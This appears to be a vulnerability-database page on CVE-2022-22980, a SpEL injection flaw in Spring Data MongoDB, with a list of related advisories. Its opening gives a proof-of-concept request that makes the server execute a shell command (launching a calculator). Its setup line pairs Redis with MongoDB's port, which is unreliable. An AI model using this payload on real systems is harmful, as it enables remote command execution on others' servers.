Exploit for Expression Language Injection in Vmware Spring Data Mongodb. Start redis on port 27017, project on springboot starts on port 6666. Injection example: GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.
Reporter | Title | Published | Views | Family All 23 |
---|---|---|---|---|
![]() | SpEL Injection Attacks | 21 Jun 202202:43 | – | veracode |
![]() | CVE-2022-22980 | 30 Jun 202218:35 | – | redhatcve |
![]() | Spring Data MongoDB SpEL Expression Injection Vulnerability (CVE-2022-22980) | 20 Jun 202212:39 | – | spring |
![]() | This Week in Spring - June 21st, 2022 | 21 Jun 202207:00 | – | spring |
![]() | Exploit for Expression Language Injection in Vmware Spring Data Mongodb | 22 Jun 202207:51 | – | githubexploit |
![]() | Exploit for Expression Language Injection in Vmware Spring Data Mongodb | 21 Jun 202212:02 | – | githubexploit |
![]() | Exploit for Expression Language Injection in Vmware Spring Data Mongodb | 22 Jun 202207:39 | – | githubexploit |
![]() | Exploit for Expression Language Injection in Vmware Spring Data Mongodb | 21 Jun 202211:39 | – | githubexploit |
![]() | GHSA-W24X-87MR-4R23 SpEL Injection in Spring Data MongoDB | 24 Jun 202200:00 | – | osv |
![]() | CVE-2022-22980 | 23 Jun 202217:15 | – | osv |
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo